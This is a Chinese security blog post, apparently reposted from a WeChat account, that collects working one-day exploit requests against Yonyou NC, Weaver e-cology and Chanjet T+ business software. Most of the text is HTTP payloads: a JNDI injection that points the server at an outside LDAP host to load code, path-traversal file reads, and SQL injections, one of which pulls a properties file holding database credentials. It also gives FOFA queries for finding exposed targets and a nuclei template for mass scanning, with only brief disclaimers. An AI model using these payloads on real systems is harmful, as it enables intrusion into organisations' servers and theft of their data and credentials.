用友NC系统registerServlet接口存在JNDI注入漏洞

admin 2024年5月14日19:12:02评论77 views字数 2269阅读7分33秒阅读模式

用友NC系统registerServlet接口存在JNDI注入漏洞

fofa

body="Client/Uclient/UClient.dmg"

poc

POST /portal/registerServlet HTTP/1.1
Host: 192.168.63.129:8088
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

type=1&dsname=ldap://172.17.176.1:8085/blvVEcJU1

用友NC系统registerServlet接口存在JNDI注入漏洞

用友NC系统registerServlet接口存在JNDI注入漏洞

用友NC系统printBill接口存在任意文件读取漏洞

poc

GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1
Host: 192.168.63.129:8088
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

用友NC系统registerServlet接口存在JNDI注入漏洞

用友NC的download文件存在任意文件读取漏洞

fofa

app="用友-UFIDA-NC"

poc

/portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp

用友NC系统registerServlet接口存在JNDI注入漏洞

yaml 批量检测

id: yonyouNC_download_fileread
info:
  name: 用友NC_download文件读取
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: word
        part: body
        words:
          - "response.addHeader"

泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞

app="泛微-OA(e-cology)"

poc

GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

用友NC系统registerServlet接口存在JNDI注入漏洞

用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞

fofa

app="畅捷通-TPlus"

poc

GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: xx.xxx.xxx.xxxAccept-Charset: utf-8
用友NC系统registerServlet接口存在JNDI注入漏洞

公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用,公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击,公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流,不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。

原文始发于微信公众号(TKing的安全圈):OA/ERP的1day你需要吗????

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日19:12:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC系统registerServlet接口存在JNDI注入漏洞https://cn-sec.com/archives/2739693.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息